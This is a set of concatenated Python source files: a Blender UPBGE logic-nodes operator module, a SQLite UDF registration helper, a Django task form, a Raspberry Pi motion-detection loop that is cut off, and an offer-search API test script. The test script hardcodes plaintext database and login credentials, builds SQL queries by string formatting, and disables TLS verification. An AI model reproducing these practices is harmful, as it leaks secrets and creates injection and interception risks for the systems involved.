game_settings.controllers:\n if c.name == controller_name:\n controller = c\n break\n if controller is None:\n bpy.ops.logic.controller_add(\n type=\"PYTHON\",\n object=obj.name\n )\n controller = game_settings.controllers[-1]\n controller.show_expanded = False\n # if 'NL_OR' not in game_settings.controllers:\n # bpy.ops.logic.controller_add(\n # type=\"LOGIC_OR\",\n # object=obj.name,\n # name='NL_OR'\n # )\n # game_settings.controllers[-1].show_expanded = False\n controller.name = controller_name\n controller.type = \"PYTHON\"\n controller.mode = \"MODULE\"\n controller.module = bge_netlogic.utilities.py_controller_module_string(\n py_module_name\n )\n # link the brick\n sensor.link(controller)\n\n\nclass NLGenerateLogicNetworkOperatorAll(bpy.types.Operator):\n bl_idname = \"bge_netlogic.generate_logicnetwork_all\"\n bl_label = \"Generate LogicNetwork\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Create the code needed to execute all logic trees\"\n\n @classmethod\n def poll(cls, context):\n return True\n\n def __init__(self):\n pass\n\n def _create_external_text_buffer(self, context, buffer_name):\n file_path = bpy.path.abspath(\"//{}\".format(buffer_name))\n return FileTextBuffer(file_path)\n\n def _create_text_buffer(self, context, buffer_name, external=False):\n if external is True:\n return self._create_external_text_buffer(context, buffer_name)\n blender_text_data_index = bpy.data.texts.find(buffer_name)\n blender_text_data = None\n if blender_text_data_index < 0:\n blender_text_data = bpy.data.texts.new(name=buffer_name)\n else:\n blender_text_data = bpy.data.texts[blender_text_data_index]\n return BLTextBuffer(blender_text_data)\n\n def execute(self, context):\n # ensure that the local \"bgelogic\" folder exists\n local_bgelogic_folder = bpy.path.abspath(\"//bgelogic\")\n if not os.path.exists(local_bgelogic_folder):\n try:\n os.mkdir(local_bgelogic_folder)\n except PermissionError:\n self.report(\n {\"ERROR\"},\n \"Cannot generate the code because the blender file has \"\n \"not been saved or the user has no write permission for \"\n \"the containing folder.\"\n )\n utils.set_compile_status(utils.TREE_FAILED)\n return {\"FINISHED\"}\n for tree in bpy.data.node_groups:\n if tree.bl_idname == bge_netlogic.ui.BGELogicTree.bl_idname:\n try:\n tree_code_generator.TreeCodeGenerator().write_code_for_tree(tree)\n except Exception as e:\n utils.error(f\"Couldn't compile tree {tree.name}!\")\n utils.error(e)\n utils.set_compile_status(utils.TREE_COMPILED_ALL)\n try:\n context.region.tag_redraw()\n except Exception:\n utils.warn(\"Couldn't redraw panel, code updated.\")\n return {\"FINISHED\"}\n\n\nclass NLGenerateLogicNetworkOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.generate_logicnetwork\"\n bl_label = \"Generate LogicNetwork\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Create the code needed to execute the current logic tree\"\n\n @classmethod\n def poll(cls, context):\n if not hasattr(context.space_data, 'edit_tree'):\n return False\n tree = context.space_data.edit_tree\n if utils.TREE_COMPILED in context.scene.logic_node_settings.tree_compiled:\n return False\n if not tree:\n return False\n if not (tree.bl_idname == bge_netlogic.ui.BGELogicTree.bl_idname):\n return False\n return context.space_data.edit_tree is not None\n\n def __init__(self):\n pass\n\n def _create_external_text_buffer(self, context, buffer_name):\n file_path = bpy.path.abspath(\"//{}\".format(buffer_name))\n return FileTextBuffer(file_path)\n\n def _create_text_buffer(self, 
context, buffer_name, external=False):\n if external is True:\n return self._create_external_text_buffer(context, buffer_name)\n blender_text_data_index = bpy.data.texts.find(buffer_name)\n blender_text_data = None\n if blender_text_data_index < 0:\n blender_text_data = bpy.data.texts.new(name=buffer_name)\n else:\n blender_text_data = bpy.data.texts[blender_text_data_index]\n return BLTextBuffer(blender_text_data)\n\n def execute(self, context):\n # ensure that the local \"bgelogic\" folder exists\n local_bgelogic_folder = bpy.path.abspath(\"//bgelogic\")\n if not os.path.exists(local_bgelogic_folder):\n try:\n os.mkdir(local_bgelogic_folder)\n except PermissionError:\n self.report(\n {\"ERROR\"},\n \"Cannot generate the code because the blender file has \"\n \"not been saved or the user has no write permission for \"\n \"the containing folder.\"\n )\n utils.set_compile_status(utils.TREE_FAILED)\n return {\"FINISHED\"}\n # write the current tree in a python module,\n # in the directory of the current blender file\n context = bpy.context\n try:\n tree = context.space_data.edit_tree\n tree_code_generator.TreeCodeGenerator().write_code_for_tree(tree)\n except Exception as e:\n utils.error(e)\n utils.warn('Automatic Update failed, attempting hard generation...')\n if getattr(bpy.context.scene.logic_node_settings, 'use_generate_all', False):\n self.report(\n {'ERROR'},\n 'Tree to edit not found! Updating All Trees.'\n )\n for tree in bpy.data.node_groups:\n if tree.bl_idname == bge_netlogic.ui.BGELogicTree.bl_idname:\n tree_code_generator.TreeCodeGenerator().write_code_for_tree(tree)\n utils.set_compile_status(utils.TREE_FAILED)\n return {\"FINISHED\"}\n else:\n self.report(\n {'ERROR'},\n 'Tree to edit not found! Aborting.'\n )\n utils.error('Tree to edit not found! 
Aborting.')\n utils.set_compile_status(utils.TREE_FAILED)\n return {\"FINISHED\"}\n utils.set_compile_status(utils.TREE_COMPILED)\n try:\n context.region.tag_redraw()\n except Exception:\n utils.warn(\"Couldn't redraw panel, code updated.\")\n return {\"FINISHED\"}\n\n\nclass NLAddGlobalOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.add_global\"\n bl_label = \"Add Global Value\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Add a value accessible from anywhere\"\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n category = utils.get_global_category()\n prop = category.content.add()\n prop.name = 'prop'\n prop.string_val = ''\n prop.float_val = 0.0\n prop.int_val = 0\n prop.bool_val = False\n prop.filepath_val = ''\n category.selected = len(category.content) - 1\n\n return {'FINISHED'}\n\n\nclass NLRemoveGlobalOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.remove_global\"\n bl_label = \"Remove Global Value\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Remove a value accessible from anywhere\"\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n category = utils.get_global_category()\n category.content.remove(category.selected)\n if category.selected > len(category.content) - 1:\n category.selected = len(category.content) - 1\n return {'FINISHED'}\n\n\nclass NLAddGlobalCatOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.add_global_cat\"\n bl_label = \"Add Global Category\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Add a global value category\"\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n scene = context.scene\n cats = scene.nl_global_categories\n cat = cats.add()\n cat.name = 'category'\n scene.nl_global_cat_selected = len(scene.nl_global_categories) - 1\n\n return {'FINISHED'}\n\n\nclass NLRemoveGlobalCatOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.remove_global_cat\"\n bl_label = \"Remove Global Category\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Remove a global value category\"\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n scene = context.scene\n scene.nl_global_categories.remove(scene.nl_global_cat_selected)\n if scene.nl_global_cat_selected > len(scene.nl_global_categories) - 1:\n scene.nl_global_cat_selected = len(scene.nl_global_categories) - 1\n return {'FINISHED'}\n\n\nclass NLLoadSoundOperator(bpy.types.Operator, ImportHelper):\n bl_idname = \"bge_netlogic.load_sound\"\n bl_label = \"Load Sound\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Load a sound file\"\n\n filter_glob: bpy.props.StringProperty(\n default='*.wav;*.mp3;*.ogg*',\n options={'HIDDEN'}\n )\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n bpy.ops.sound.open_mono(\n filepath=self.filepath,\n mono=True,\n relative_path=True,\n filter_sound=True\n )\n return {'FINISHED'}\n\n\nclass NLLoadImageOperator(bpy.types.Operator, ImportHelper):\n bl_idname = \"bge_netlogic.load_image\"\n bl_label = \"Load Image\"\n bl_options = {'REGISTER', 'UNDO'}\n bl_description = \"Load an image file\"\n\n filter_glob: bpy.props.StringProperty(\n default='*.jpg;*.png;*.jpeg;*.JPEG;',\n options={'HIDDEN'}\n )\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n bpy.ops.image.open(\n filepath=self.filepath,\n relative_path=True,\n filter_image=True\n )\n # .value = 
os.path.basename(self.filepath)\n        return {'FINISHED'}\n\n\nclass NLAddPropertyOperator(bpy.types.Operator):\n    bl_idname = \"bge_netlogic.add_game_prop\"\n    bl_label = \"Add Game Property\"\n    bl_options = {'REGISTER', 'UNDO'}\n    bl_description = \"Add a property available to the UPBGE\"\n\n    @classmethod\n    def poll(cls, context):\n        return True\n\n    def execute(self, context):\n        bpy.ops.object.game_property_new()\n        bge_netlogic.update_current_tree_code()\n        return {'FINISHED'}\n\n\nclass NLAddComponentOperator(bpy.types.Operator):\n    bl_idname = \"bge_netlogic.add_component\"\n    bl_label = \"Add Component\"\n    bl_options = {'REGISTER', 'UNDO'}\n    bl_description = \"Add a python Component to the selected object.\"\n\n    @classmethod\n    def poll(cls, context):\n        return True\n\n    def execute(self, context):\n        bpy.ops.logic.python_component_register()\n        bge_netlogic.update_current_tree_code()\n        return {'FINISHED'}\n\n\nclass NLRemovePropertyOperator(bpy.types.Operator):\n    bl_idname = \"bge_netlogic.remove_game_prop\"\n    bl_label = \"Remove Game Property\"\n    bl_description = \"Remove this property\"\n    bl_options = {'REGISTER', 'UNDO'}\n    index: bpy.props.IntProperty()\n\n    @classmethod\n    def poll(cls, context):\n        return True\n\n    def execute(self, context):\n        bpy.ops.object.game_property_remove(index=self.index)\n        bge_netlogic.update_current_tree_code()\n        return {'FINISHED'}\n\n\nclass NLMovePropertyOperator(bpy.types.Operator):\n    bl_idname = \"bge_netlogic.move_game_prop\"\n    bl_label = \"Move Game Property\"\n    bl_description = \"Move Game Property\"\n    bl_options = {'REGISTER', 'UNDO'}\n    index: bpy.props.IntProperty()\n    direction: bpy.props.StringProperty()\n\n    @classmethod\n    def poll(cls, context):\n        return True\n\n    def execute(self, context):\n        bpy.ops.object.game_property_move(\n            index=self.index,\n            direction=self.direction\n        )\n        bge_netlogic.update_current_tree_code()\n        return {'FINISHED'}\n\n\nclass NLRefreshNodeCode(bpy.types.Operator):\n    bl_idname = \"bge_netlogic.refresh_node_code\"\n    bl_label = \"Refresh Nodes\"\n    bl_description = \"Update the node package installed in UPBGE python\"\n    bl_options = {'REGISTER', 'UNDO'}\n\n    @classmethod\n    def poll(cls, context):\n        return True\n\n    def execute(self, context):\n        # Regenerate the logic tree code so the node package used by UPBGE is current\n        bge_netlogic.update_current_tree_code()\n        return {'FINISHED'}\n\n\nclass NLSwitchInitialNetworkStatusOperator(bpy.types.Operator):\n    bl_idname = \"bge_netlogic.switch_network_status\"\n    bl_label = \"Enable/Disable at start\"\n    bl_description = \"Enables or disables the logic tree at start for the \\\n        selected objects\"\n    bl_options = {'REGISTER', 'UNDO'}\n    tree_name: bpy.props.StringProperty()\n    current_status: bpy.props.BoolProperty()\n\n    @classmethod\n    def poll(cls, context):\n        return True\n\n    def execute(self, context):\n        current_status = self.current_status\n        new_status = not current_status\n        tree_name = self.tree_name\n        scene = context.scene\n        updated_objects = [\n            ob for ob in scene.objects if ob.select_get() and\n            bge_netlogic.utilities.object_has_treeitem_for_treename(\n                ob, tree_name\n            )\n        ]\n        for ob in updated_objects:\n            bge_netlogic.utilities.set_network_initial_status_key(\n                ob, tree_name, new_status\n            )\n        bge_netlogic.update_current_tree_code()\n        return {'FINISHED'}\n\n\n# Popup the code templates for custom nodes and cells\nclass NLPopupTemplatesOperator(bpy.types.Operator):\n    bl_idname = \"bge_netlogic.popup_templates\"\n    bl_label = \"Show Custom Node Templates\"\n    bl_description = 
(\n 'Load the template code for custom nodes '\n 'and cells in the text editor'\n )\n bl_options = {'REGISTER', 'UNDO'}\n\n @classmethod\n def poll(cls, context):\n return True\n\n def execute(self, context):\n node_code = self.get_or_create_text_object(\"my_custom_nodes.py\")\n cell_code = self.get_or_create_text_object(\"my_custom_cells.py\")\n self.load_template(node_code, \"my_custom_nodes.txt\")\n self.load_template(cell_code, \"my_custom_cells.txt\")\n self.report({\"INFO\"}, \"Templates available in the text editor\")\n return {'FINISHED'}\n\n def load_template(self, text_object, file_name):\n import os\n this_dir = os.path.dirname(os.path.realpath(__file__))\n parent_dir = os.path.dirname(this_dir)\n templates_dir = os.path.join(parent_dir, \"templates\")\n template_file = os.path.join(templates_dir, file_name)\n text_data = \"Error Reading Template File\"\n with open(template_file, \"r\") as f:\n text_data = f.read()\n text_object.from_string(text_data)\n\n def get_or_create_text_object(self, name):\n index = bpy.data.texts.find(name)\n if index < 0:\n bpy.ops.text.new()\n result = bpy.data.texts[-1]\n result.name = name\n return result\n else:\n return bpy.data.texts[index]\n\n\n#################################################################################\n# Web Buttons\n#################################################################################\n\n\nclass NLAddonPatreonButton(bpy.types.Operator):\n bl_idname = \"bge_netlogic.donate\"\n bl_label = \"Support this Project\"\n bl_description = \"Consider supporting this Add-On\"\n\n def execute(self, context):\n webbrowser.open('https://www.buymeacoffee.com/izaz')\n return {\"FINISHED\"}\n\n\nclass NLBGEDocsButton(bpy.types.Operator):\n bl_idname = \"bge_netlogic.bge_docs\"\n bl_label = \"Engine API\"\n\n def execute(self, context):\n webbrowser.open('https://upbge.org/api')\n return {\"FINISHED\"}\n\n\nclass NLUPBGEDocsButton(bpy.types.Operator):\n bl_idname = \"bge_netlogic.upbge_docs\"\n bl_label = \"Manual\"\n\n def execute(self, context):\n webbrowser.open('https://upbge.org/manual')\n return {\"FINISHED\"}\n\n\nclass NLDocsButton(bpy.types.Operator):\n bl_idname = \"bge_netlogic.nl_docs\"\n bl_label = \"Logic Nodes Documentation\"\n\n def execute(self, context):\n webbrowser.open('https://github.com/IzaZed/Uchronian-Logic-UPBGE-Logic-Nodes/wiki')\n return {\"FINISHED\"}\n\n\nclass NLAddonGithubButton(bpy.types.Operator):\n bl_idname = \"bge_netlogic.github\"\n bl_label = \"GitHub\"\n bl_description = \"Get involved with development\"\n\n def execute(self, context):\n webbrowser.open('https://github.com/IzaZed/Uchronian-Logic-UPBGE-Logic-Nodes/issues')\n return {\"FINISHED\"}\n","sub_path":"ops/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":48140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"594886247","text":"import sqlite3\n\nfrom typing import Callable\n\nfrom numba.types import ClassType\n\nfrom .cslumba import get_sqlite_db\nfrom .sqlite import (\n sqlite3_create_function,\n scalarfunc, stepfunc, finalizefunc, valuefunc, inversefunc, destroyfunc,\n sqlite3_create_window_function,\n sqlite3_errmsg,\n SQLITE_DETERMINISTIC,\n SQLITE_UTF8,\n SQLITE_OK,\n)\nfrom .scalar import sqlite_udf\nfrom .aggregate import sqlite_udaf\n\n__all__ = (\n 'create_function',\n 'create_aggregate',\n 'sqlite_udf',\n 'sqlite_udaf',\n)\n\ndef create_function(\n con: sqlite3.Connection,\n name: str,\n num_params: int,\n func: Callable,\n deterministic: 
bool = False\n) -> None:\n \"\"\"Register a UDF with name `name` with the SQLite connection `con`.\n\n Parameters\n ----------\n con : sqlite3.Connection\n A connection to a SQLite database\n name : str\n The name of this function in the database, given as a UTF-8 encoded\n string\n num_params : int\n The number of arguments this function takes\n func : cfunc\n The sqlite_udf-decorated function to register\n deterministic : bool\n True if this function returns the same output given the same input.\n Most functions are deterministic.\n\n \"\"\"\n sqlite_db = get_sqlite_db(con)\n if sqlite3_create_function(\n sqlite_db,\n name.encode('utf8'),\n num_params,\n SQLITE_UTF8 | (SQLITE_DETERMINISTIC if deterministic else 0),\n None,\n scalarfunc(getattr(func, 'address')),\n stepfunc(0),\n finalizefunc(0),\n ) != SQLITE_OK:\n raise sqlite3.OperationalError(sqlite3_errmsg(sqlite_db))\n\n\ndef create_aggregate(\n con: sqlite3.Connection,\n name: str,\n num_params: int,\n aggregate_class: ClassType,\n deterministic: bool = False\n) -> None:\n \"\"\"Register an aggregate named `name` with the SQLite connection `con`.\n\n Parameters\n ----------\n con : sqlite3.Connection\n A connection to a SQLite database\n name : str\n The name of this function in the database, given as a UTF-8 encoded\n string\n num_params : int\n The number of arguments this function takes\n aggregate_class : JitClass\n This class must be decorated with @sqlite_udaf for this function to\n work. If this class has `value` and `inverse` attributes, it will be\n registered as a window function. Window functions can also be used as\n standard aggregate functions.\n deterministic : bool\n True if this function returns the same output given the same input.\n Most functions are deterministic.\n\n \"\"\"\n namebytes = name.encode('utf8')\n sqlite_db = get_sqlite_db(con)\n if hasattr(aggregate_class, 'value') and hasattr(\n aggregate_class, 'inverse'\n ):\n rc = sqlite3_create_window_function(\n sqlite_db,\n namebytes,\n num_params,\n SQLITE_UTF8 | (SQLITE_DETERMINISTIC if deterministic else 0),\n None,\n stepfunc(aggregate_class.step.address),\n finalizefunc(aggregate_class.finalize.address),\n valuefunc(aggregate_class.value.address),\n inversefunc(aggregate_class.inverse.address),\n destroyfunc(0),\n )\n else:\n rc = sqlite3_create_function(\n sqlite_db,\n namebytes,\n num_params,\n SQLITE_UTF8 | (SQLITE_DETERMINISTIC if deterministic else 0),\n None,\n scalarfunc(0),\n stepfunc(aggregate_class.step.address),\n finalizefunc(aggregate_class.finalize.address),\n )\n if rc != SQLITE_OK:\n raise sqlite3.OperationalError(sqlite3_errmsg(sqlite_db))\n","sub_path":"slumba/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"264303639","text":"import ast\nimport math\nimport dateutil.parser\nimport requests\nimport json\nimport copy\nimport mysql\nimport xlrd\nimport xlwt\nimport datetime\nfrom mysql import connector\nclass Excel_Data:\n def __init__(self):\n # self.job_filters = ['JobIds','Name','NoOfOpeningsFrom','NoOfOpeningsTo','RoleIds','OwnerIds','LocationIds','IsJobUtilized',\n # 'DepartmentIds','JobCodeIds','SalaryStart','SalaryEnd','ExperienceStart','ExperienceEnd','IsJobPosted',\n # 'SkillIds']\n\n self.xl_json_request = []\n self.xl_excepted_offer_id = []\n self.rownum = 1\n\n self.boundary_range = [1270554,1275033,1275038,1275048,1275035,1275045,1275039,1275042,1275041,1275040,1275037,\n 
1275036,1275034,1275033,1275047,1275046,1275044,1275043,1275052,1275051,1275050,1275049,\n 1274203,1274015,1269995,1269912,1265771,1265774,1265771,1275037]\n\n self.__style0 = xlwt.easyxf('font: name Times New Roman, color-index black, bold on')\n self.__style1 = xlwt.easyxf('font: name Times New Roman, color-index black, bold off')\n self.__style2 = xlwt.easyxf('font: name Times New Roman, color-index red, bold on')\n self.__style3 = xlwt.easyxf('font: name Times New Roman, color-index green, bold on')\n\n self.wb_result = xlwt.Workbook()\n self.ws = self.wb_result.add_sheet('Offer Search Result')\n self.ws.write(0, 0, 'Request', self.__style0)\n self.ws.write(0, 1, 'API Count', self.__style0)\n self.ws.write(0, 2, 'DB Count', self.__style0)\n self.ws.write(0, 3, 'Expected Offer Id\\'s', self.__style0)\n self.ws.write(0, 4, 'Not Matched Id\\'s', self.__style0)\n\n self.conn = mysql.connector.connect(host='35.154.36.218',\n database='appserver_core',\n user='hireprouser',\n password='tech@123')\n self.cursor = self.conn.cursor()\n # self.tenant_id = 1782\n now = datetime.datetime.now()\n self.__current_DateTime = now.strftime(\"%d-%m-%Y\")\n\n header = {\"content-type\": \"application/json\"}\n data = {\"LoginName\": \"admin\", \"Password\": \"Automation@123\", \"TenantAlias\": \"rpoautomation\", \"UserName\": \"admin\"}\n response = requests.post(\"https://amsin.hirepro.in/py/common/user/login_user/\", headers=header,\n data=json.dumps(data), verify=True)\n self.TokenVal = response.json()\n print (self.TokenVal.get(\"Token\"))\n\n wb = xlrd.open_workbook(\"C:\\PythonAutomation\\InputForJobOfferResumeSearch\\OfferSearchInput.xls\")\n sheetname = wb.sheet_names() # Reading XLS Sheet names\n print(sheetname)\n sh1 = wb.sheet_by_index(0) #\n i = 1\n for i in range(1, sh1.nrows):\n rownum = (i)\n rows = sh1.row_values(rownum)\n self.xl_json_request.append(rows[0])\n self.xl_excepted_offer_id.append(str(rows[1]))\n\n local = self.xl_excepted_offer_id\n print (type(local))\n length = len(self.xl_excepted_offer_id)\n self.new_local = []\n\n for i in range(0, length):\n j = [int(float(b)) for b in local[i].split(',')]\n self.new_local.append(j)\n self.xl_expected = self.new_local\n\n def json_data(self):\n r = requests.post(\"https://amsin.hirepro.in/py/rpo/get_all_offers/\", headers=self.headers,\n data=json.dumps(self.data, default=str), verify=False)\n print (self.data)\n # print r.content\n resp_dict = json.loads(r.content)\n self.status = resp_dict['status']\n print (resp_dict)\n\n if self.status == 'OK':\n self.count = resp_dict['TotalItemCount']\n self.total_pages1 = float(self.count)/200\n self.total_pages = math.ceil(self.total_pages1)\n self.total_pages = int(self.total_pages)\n\n # print self.count\n else:\n self.count = \"400000000000000\"\n # print self.count\n\n def json_data_iteration(self, data, iter):\n iter += 1\n self.actual_ids = []\n for i in range(1, iter):\n self.data[\"PagingCriteria\"][\"PageNo\"] = i\n r = requests.post(\"https://amsin.hirepro.in/py/rpo/get_all_offers/\", headers=self.headers,\n data=json.dumps(data, default=str), verify=False)\n resp_dict = json.loads(r.content)\n # print resp_dict\n for element in resp_dict[\"Offers\"]:\n self.actual_ids.append(element[\"CandidateId\"])\n # print element1\n # print len(self.actual_ids)\n # print self.actual_ids\n\n def all(self):\n tot_len = len(self.xl_json_request)\n for i in range(0, tot_len):\n print (\"Iteration Count :- %s \" % i)\n # self.xl_request = ast.literal_eval(self.xl_json_request[i])\n self.xl_request= 
json.loads(self.xl_json_request[i])\n self.xl_request1 = copy.deepcopy(self.xl_request)\n\n if self.xl_request.get(\"CandidateId\"):\n self.xl_request[\"CandidateId\"] = self.boundary_range\n # print self.xl_request\n else:\n val = [(\"CandidateId\", self.boundary_range)]\n id_filter = dict(val)\n self.xl_request.update(id_filter)\n # print self.xl_request\n # self.ws.write(self.rownum, 0, str(self.xl_request1))\n # all_keys = self.xl_request.keys()\n\n self.headers = {\"content-type\": \"application/json\", \"X-AUTH-TOKEN\": self.TokenVal.get(\"Token\")}\n self.data = {\"PagingCriteria\":{\"MaxResults\":200,\"PageNo\":1},\"GetAllOffersOption\":\"2\",\"Filters\":self.xl_request}\n print (self.data)\n self.json_data()\n self.total_api_count = self.count\n if self.count != \"400000000000000\":\n self.data[\"PagingCriteria\"] = {\"IsRefresh\": False, \"MaxResults\": 200, \"PageNo\": 1, \"ObjectState\": 0}\n # print self.data\n #print (self.total_pages)\n self.json_data_iteration(self.data, self.total_pages)\n # print self.xl_expected[i]\n # print type(self.xl_expected[i])\n # print self.actual_ids\n # print type(self.actual_ids)\n self.mismatched_id = set(self.xl_expected[i]) - set(self.actual_ids)\n # print self.mismatched_id\n\n self.Query_Generation()\n\n expected_id = str(self.xl_expected[i])\n expected_id = expected_id.strip('[]')\n mismatched_id = str(list(self.mismatched_id))\n mismatched_id = mismatched_id.strip('[]')\n\n self.ws.write(self.rownum, 0, str(self.xl_request1))\n if self.total_api_count == self.Query_Result1:\n self.ws.write(self.rownum, 1, self.total_api_count, self.__style3)\n self.ws.write(self.rownum, 2, self.Query_Result1, self.__style3)\n self.ws.write(self.rownum, 3, expected_id, self.__style3)\n self.ws.write(self.rownum, 4, mismatched_id, self.__style2)\n\n elif self.total_api_count == '400000000000000':\n print (\"API Failed\")\n self.ws.write(self.rownum, 1, \"API Failed\", self.__style2)\n self.ws.write(self.rownum, 2, self.Query_Result1, self.__style2)\n self.ws.write(self.rownum, 3, expected_id, self.__style3)\n self.ws.write(self.rownum, 4, \"API Failed\", self.__style2)\n else:\n print (\"this is else part \\ n\")\n self.ws.write(self.rownum, 1, self.total_api_count, self.__style2)\n self.ws.write(self.rownum, 2, self.Query_Result1, self.__style2)\n self.ws.write(self.rownum, 3, expected_id, self.__style3)\n self.ws.write(self.rownum, 4, mismatched_id, self.__style2)\n self.wb_result.save(\n 'C:\\PythonAutomation\\OfferSearchResults/'\n + self.__current_DateTime + '_Combined_Offer_Search.xls')\n # print statusCode, \" -- \", b\n self.rownum = self.rownum + 1\n\n\n\n def Query_Generation(self):\n select_str = \"select count(distinct(ap.id)) from applicant_statuss ap \" \\\n \"inner join candidates c on c.id = ap.candidate_id \" \\\n \"inner join jobs j on j.id = ap.job_id \" \\\n \"inner join resume_statuss stat on stat.id=ap.current_status_id \" \\\n \"inner join resume_statuss stag on stag.id=stat.resumestatus_id \" \\\n \"left join offers o on o.id = ap.offer_id \"\n a = self.xl_request.get(\"CandidateId\")\n values = ','.join(str(v) for v in a)\n where_str = \"ap.tenant_id=1793 and stag.base_name='Offer'\"\n\n\n if self.xl_request.get(\"CandidateName\"):\n where_str += \" and c.candidate_name like '%{}%' \".format(self.xl_request.get(\"CandidateName\"))\n\n if self.xl_request.get(\"JobLocationIds\"):\n where_str += \" and j.location_id ={} \".format(self.xl_request.get(\"JobLocationIds\")[0])\n if self.xl_request.get(\"SourceIds\"):\n where_str += \" 
and c.original_source_id ={} \".format(self.xl_request.get(\"SourceIds\")[0])\n if self.xl_request.get(\"DepartmentId\"):\n where_str += \" and j.department_id ={} \".format(self.xl_request.get(\"DepartmentId\"))\n if self.xl_request.get(\"JobIds\"):\n a = self.xl_request.get(\"JobIds\")\n values = ','.join(str(v) for v in a)\n where_str += \" and j.id in(%s) \" % values\n if self.xl_request.get(\"JoiningDateFrom\") and self.xl_request.get(\"JoiningDateTill\"):\n joining_date_from = self.xl_request.get(\"JoiningDateFrom\")\n joining_date_till = self.xl_request.get(\"JoiningDateTill\")\n where_str += \" and o.date_of_joining between '%s' and '%s' \" % (joining_date_from, joining_date_till)\n if self.xl_request.get(\"ModifiedBy\"):\n where_str += \" and o.modified_by ={} \".format(self.xl_request.get(\"ModifiedBy\"))\n if self.xl_request.get(\"OfferCreatedFrom\") and self.xl_request.get(\"OfferCreatedTill\"):\n offer_created_from = self.xl_request.get(\"OfferCreatedFrom\")\n offer_created_till = self.xl_request.get(\"OfferCreatedTill\")\n where_str += \" and o.created_on between '%s' and '%s' \" % (offer_created_from, offer_created_till)\n if self.xl_request.get(\"StageId\"):\n where_str += \" and stag.id ={} \".format(self.xl_request.get(\"StageId\"))\n if self.xl_request.get(\"StatusIds\"):\n a = self.xl_request.get(\"StatusIds\")\n values = ','.join(str(v) for v in a)\n where_str += \" and stat.id in(%s) \" % values\n\n # if self.xl_request.get(\"StatusIds\"):\n # where_str += \" and stat.id ={} \".format(self.xl_request.get(\"StatusIds\")[0])\n\n final_qur = \"\"\n if where_str:\n final_qur = select_str + \" where \" + where_str\n self.query = final_qur\n if final_qur:\n try:\n self.cursor.execute(final_qur)\n Query_Result = self.cursor.fetchone()\n print (Query_Result)\n print (final_qur)\n self.Query_Result1 = Query_Result[0]\n except Exception as e:\n print (e)\n\n\n\n # def date_converter(self, input_date):\n # converted_utc_date = dateutil.parser.parse(input_date)\n # converted_local_date = converted_utc_date.astimezone(dateutil.tz.tzlocal()).replace(tzinfo=None)\n # date = converted_local_date.strftime(\"%Y-%m-%d\")\n # return date\n\nprint (\"Offer Search Script Started\")\nxlob = Excel_Data()\nxlob.all()\nprint (\"Completed Successfully \")","sub_path":"RPO/TestScripts/TestScripts/DummyScripts/OfferSearch.py","file_name":"OfferSearch.py","file_ext":"py","file_size_in_byte":11924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"36889375","text":"from django import forms\nfrom scrum_board.models import Task\n\n\nclass TaskForm(forms.ModelForm):\n \"\"\"\n Forma que procesa la creacion y edicion de un Task\n \"\"\"\n\n\n def __init__(self,*args,**kwargs):\n\n try:\n\n self.sprint = kwargs.pop('sprint')\n\n except:\n\n self.sprint = None\n\n super(TaskForm, self).__init__(*args, **kwargs)\n\n\n def save(self):\n\n task = super(TaskForm, self).save(commit = False)\n\n if task.pk:\n\n task.save()\n\n else:\n\n task.sprint = self.sprint\n task.save()\n return task\n\n class Meta:\n model = Task\n fields = ['name', 'type', 'description', 'status', 'due_date']\n\nclass CreateTaskForm(TaskForm):\n\n\n class Meta:\n model = Task\n fields = ['name', 'type', 'description', 'due_date']\n","sub_path":"scrum/scrum_board/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"378055787","text":"from picamera import 
PiCamera\nfrom time import sleep\nfrom PIL import Image, ImageOps\nimport numpy as np\nimport os\nfrom datetime import datetime\ncycle = 0\ntry: \n while True:\n camera = PiCamera()\n camera.resolution = (800,600)\n camera.rotation = 180\n # camera.start_preview()\n sleep(0.5)\n camera.capture('/home/pi/Desktop/img1.jpg')\n sleep(0.2)\n camera.capture('/home/pi/Desktop/motion.jpg')\n # camera.stop_preview()\n camera.close()\n\n img1 = Image.open('/home/pi/Desktop/img1.jpg')\n img2 = Image.open('/home/pi/Desktop/motion.jpg')\n\n img1_gray = ImageOps.grayscale(img1)\n img2_gray = ImageOps.grayscale(img2)\n\n img1_resized = img1_gray.resize((25,25))\n img2_resized = img2_gray.resize((25,25))\n\n buffer1 = np.asarray(img1_resized)\n buffer2 = np.asarray(img2_resized)\n\n img1_gray = buffer1.flatten()\n img2_gray = buffer2.flatten()\n\n images = zip(img1_gray, img2_gray)\n\n diff = 0\n\n for pixel in images:\n px1, px2 = pixel\n delta = abs(int(px1)-int(px2))\n if delta > 5:\n diff += 1\n if (cycle % 99 == 0):\n print('cycle = ', cycle)\n if (cycle == 999999):\n cycle = 0\n now = datetime.now()\n string_time = now.strftime(\"%d/%m/%Y, %H:%M:%S\")\n print('monitoring', string_time)\n if diff > 50:\n print('motion detected: ', diff, '\\n Uploading...')\n now = datetime.now()\n string_time = 